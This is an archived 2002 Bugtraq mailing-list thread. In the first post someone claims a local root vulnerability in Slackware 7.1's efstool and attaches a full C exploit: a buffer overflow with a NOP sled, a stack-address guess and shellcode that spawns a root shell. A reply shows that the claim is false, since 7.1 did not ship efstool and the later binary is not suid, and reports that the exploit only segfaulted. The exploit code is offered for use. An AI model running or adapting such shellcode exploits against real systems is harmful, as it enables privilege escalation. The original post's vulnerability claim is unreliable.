linux, säkerhet

75261 2002-09-12  02:27  /15 rader/ Cloud Ass <cloudass@antionline.org>
Importerad: 2002-09-12  02:27  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <1471>
Ärende: efstool slackware 7.1 local root exploit exploit included
------------------------------------------------------------
There exsists a local root in slackware 7.1 in the efstool package,
here is an exploit. Quick fix just chmod efstool -s. Enough said, any
questions feel free to e-mail me back.



------------------------------------------------------------
Email account furnished courtesy of AntiOnline - http://www.AntiOnline.com
AntiOnline - The Internet's Information Security Super Center!


---------------------------------------------------------------------
Express yourself with a super cool email address from BigMailBox.com.
Hundreds of choices. It's free!
http://www.bigmailbox.com
---------------------------------------------------------------------
(75261) /Cloud Ass <cloudass@antionline.org>/(Ombruten)
Bilaga (application/octet-stream) i text 75262
75262 2002-09-12  02:27  /63 rader/ Cloud Ass <cloudass@antionline.org>
Bilagans filnamn: "efstool.c"
Importerad: 2002-09-12  02:27  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <1472>
Bilaga (text/plain) till text 75261
Ärende: Bilaga (efstool.c) till: efstool slackware 7.1 local root exploit exploit included
------------------------------------------------------------
/* efstool.c - efstool/bof simple overflow in efstool, 
 *
 *
 * This code is published propterty of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of 
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if neccesary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.
 * 
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define SIZE 3000			
#define NOP 0x90		
#define PATH "/opt/gnome/bin/efstool"	

//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------

char shellcode[]=
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
	char buffer[SIZE];
	long retaddr, offset;
	int i;

	offset = atoi(argv[1]);
	retaddr = get_esp() + offset;

	for(i=0; i < SIZE; i+=4)
	 	*(long *)&buffer[i] = retaddr;

	for(i=0; i < strlen(shellcode); i++)
		*(buffer+i) = NOP;

	memcpy(buffer+i, shellcode, strlen(shellcode));
	execl(PATH, "efstool", buffer, 0);
	return 0;
}
(75262) /Cloud Ass <cloudass@antionline.org>/-------
75342 2002-09-12  18:04  /64 rader/ Jeffrey Denton <dentonj@c2i2.com>
Importerad: 2002-09-12  18:04  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <1480>
Ärende: Re: efstool slackware 7.1 local root exploit exploit included
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 10 Sep 2002, Cloud Ass wrote:

> There exsists a local root in slackware 7.1 in the efstool package, here is
> an exploit. Quick fix just chmod efstool -s. Enough said, any questions feel
> free to e-mail me back.

That's actually kind of interesting, since Slackware 7.1 and previous
versions didn't install efstool or bonobo.  Each version of Slackware
has a MANIFEST.gz file which lists everything that is installed
during a full install.

The following was performed on a Slackware 8.1 system:

# grep efstool /var/log/packages/*
/var/log/packages/bonobo-1.0.20-i386-1:36:usr/bin/efstool
# ls -l /usr/bin/efstool
- -rwxr-xr-x    1 root     bin         14308 May  5 18:44 /usr/bin/efstool*
# ncftpget ftp://ftp.slackware.com/pub/slackware/slackware-7.1/slakware/MANIFEST.gz
MANIFEST.gz:                                           766.91 kB    4.45 kB/s
# zgrep bonobo MANIFEST.gz
33702:-rw-r--r-- root/root      5279 2000-05-30 01:37
usr/share/glade/gnome/gnome-bonobo-check.m4
# zgrep efstool MANIFEST.gz
#


Compare with Slackware 8.0 and 8.1:
# ncftpget ftp://ftp.slackware.com/pub/slackware/slackware-8.0/slakware/MANIFEST.gz
MANIFEST.gz:                                             1.37 MB    4.51 kB/s
# zgrep efstool MANIFEST.gz
36086:-rwxr-xr-x root/root     11224 2001-05-20 17:06 opt/gnome/bin/efstool
# ncftpget
ftp://ftp.slackware.com/pub/slackware/slackware-8.1/slackware/MANIFEST.gz
MANIFEST.gz:                                             1.56 MB    4.37 kB/s
# zgrep efstool MANIFEST.gz
35115:-rwxr-xr-x root/bin      14308 2002-05-05 18:44:05 usr/bin/efstool


After changing the path to efstool in efstool.c, I ran the exploit on
Slackware 8.1.  $ gcc -o efstool_exploit efstool.c $
./efstool_exploit Segmentation fault $

Interesting, but it's hardly a root exploit since efstool is not
suid.  And claiming that there is a local root exploit in Slackware
7.1 is just plain wrong.

Enjoy

dentonj

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9gECUZLAxqqBWfgYRAqL+AJoCuORXVehDHt1E8fqQRqXFPkpS0ACfVgKN
AMN6AryEibmp3SatrOPeM4c=
=WUy4
-----END PGP SIGNATURE-----
(75342) /Jeffrey Denton <dentonj@c2i2.com>/(Ombruten)